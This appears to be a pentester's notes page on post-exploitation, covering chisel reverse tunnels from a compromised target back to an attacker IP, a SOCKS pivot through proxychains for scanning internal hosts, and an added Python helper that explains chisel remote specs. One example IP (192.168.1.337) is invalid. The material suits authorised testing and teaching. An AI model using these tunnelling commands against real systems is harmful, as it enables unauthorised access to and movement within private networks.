Post Exploitation

This page contains notes on post-exploitation.

About Post Exploitation

Post-exploitation refers to the phase of a cybersecurity attack that occurs after an attacker has successfully compromised a target system. During this phase, the attacker aims to maintain access, gather valuable information, escalate privileges, and potentially launch further attacks. It involves activities such as lateral movement within the network, data exfiltration, creating backdoors, and covering their tracks to avoid detection. Post-exploitation is a crucial part of the attack lifecycle as it allows the attacker to maximize the impact of their initial compromise and achieve their ultimate objectives.

Tunneling with Chisel

Chisel is a fast TCP/UDP tunnel, transported over HTTP and secured via SSH. It is a single executable that includes both client and server, written in Go (golang). Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network.

Exposing Internal Service

On the attacker machine, run this command:

chisel server -p 2525 --socks5 --reverse -v

For example, if the target has a service listening on localhost port 8000, run this command on the target:

./chisel client 10.10.14.46:2525 R:8001:127.0.0.1:8000

The chisel server now listens on port 8001 on the attacker machine and forwards each connection through the tunnel to 127.0.0.1:8000 on the target, so the service can be reached via port 8001 on our machine.

Scanning Internal Server / IP

On the attacker machine, run the chisel server:

./chisel server -p 31337 --socks5 --reverse -v

On the target, run the client with a reverse SOCKS remote:

./chisel client 10.10.200.13:31337 R:31338:socks

On the attacker machine, add the resulting SOCKS listener to proxychains4.conf:

socks5 127.0.0.1 31338

Internal target IPs can now be scanned through the proxy from the attacker machine:

proxychains4 nmap 192.168.1.337
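Both client commands above use chisel's remote syntax, [R:]<local-host>:<local-port>:<remote-host>:<remote-port>, where the R: prefix makes the server the listening side. The following Python helper is an added example, not part of these notes or of the chisel project: it parses such a spec, states which side listens and where traffic exits the tunnel, and derives the proxychains4.conf line for a reverse socks remote. The defaults it encodes (local host 0.0.0.0, local port equal to the remote port, socks remotes defaulting to 127.0.0.1:1080) are my reading of the chisel README and are an assumption to check against the chisel version in use.

```python
# Added example: interpret chisel remote specs. Not chisel's own code and not
# part of the original notes. The defaults below are my reading of the chisel
# README ([R:]<local-host>:<local-port>:<remote-host>:<remote-port>) and are
# an assumption to verify against the chisel version actually in use.
from dataclasses import dataclass
from typing import Optional


@dataclass
class Remote:
    reverse: bool                # R: prefix -> the server listens, the client dials out
    local_host: str              # address the listening side binds
    local_port: int
    remote_host: Optional[str]   # None for a socks remote
    remote_port: Optional[int]
    socks: bool                  # "socks" in place of remote host:port

    def describe(self) -> str:
        """Plain-language summary of which side listens and where traffic exits."""
        listener = "server" if self.reverse else "client"
        exit_side = "client" if self.reverse else "server"
        head = f"chisel {listener} listens on {self.local_host}:{self.local_port}"
        if self.socks:
            return f"{head}; connections exit the tunnel as a SOCKS5 proxy on the {exit_side}"
        return (f"{head}; each connection is forwarded through the tunnel to "
                f"{self.remote_host}:{self.remote_port} as seen from the {exit_side}")


def _port(text: str) -> int:
    port = int(text)
    if not 0 < port < 65536:
        raise ValueError(f"port out of range: {text}")
    return port


def parse_remote(spec: str) -> Remote:
    """Parse one chisel remote (TCP only; no /udp suffix, no IPv6 literals)."""
    reverse = spec.startswith("R:")
    body = spec[2:] if reverse else spec
    if "/" in body:
        raise ValueError("protocol suffix not handled by this example")
    parts = body.split(":")

    if parts[-1] == "socks":
        # Assumed default for a socks remote: 127.0.0.1:1080
        head = parts[:-1]
        if len(head) == 0:
            host, port = "127.0.0.1", 1080
        elif len(head) == 1:
            host, port = "127.0.0.1", _port(head[0])
        elif len(head) == 2:
            host, port = head[0], _port(head[1])
        else:
            raise ValueError(f"malformed socks remote: {spec}")
        return Remote(reverse, host, port, None, None, True)

    if len(parts) == 1:      # <remote-port>
        rport = _port(parts[0])
        return Remote(reverse, "0.0.0.0", rport, "0.0.0.0", rport, False)
    if len(parts) == 2:      # <remote-host>:<remote-port>
        rport = _port(parts[1])
        return Remote(reverse, "0.0.0.0", rport, parts[0], rport, False)
    if len(parts) == 3:      # <local-port>:<remote-host>:<remote-port>
        return Remote(reverse, "0.0.0.0", _port(parts[0]), parts[1], _port(parts[2]), False)
    if len(parts) == 4:      # full form
        return Remote(reverse, parts[0], _port(parts[1]), parts[2], _port(parts[3]), False)
    raise ValueError(f"malformed remote: {spec}")


def proxychains_line(remote: Remote) -> str:
    """proxychains4.conf entry for the machine where the socks listener lives."""
    if not remote.socks:
        raise ValueError("not a socks remote")
    return f"socks5 {remote.local_host} {remote.local_port}"


if __name__ == "__main__":
    # The two remotes from the notes above
    for spec in ("R:8001:127.0.0.1:8000", "R:31338:socks"):
        r = parse_remote(spec)
        print(f"{spec:26} -> {r.describe()}")
        if r.socks:
            print(f"{'':26}    proxychains4.conf: {proxychains_line(r)}")
```

Run it directly to see the two remotes from these notes explained; with R:31338:socks it prints the same "socks5 127.0.0.1 31338" line that the proxychains step uses, which is why that entry points at localhost on the server (attacker) side even though the SOCKS traffic exits on the client (target) side.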
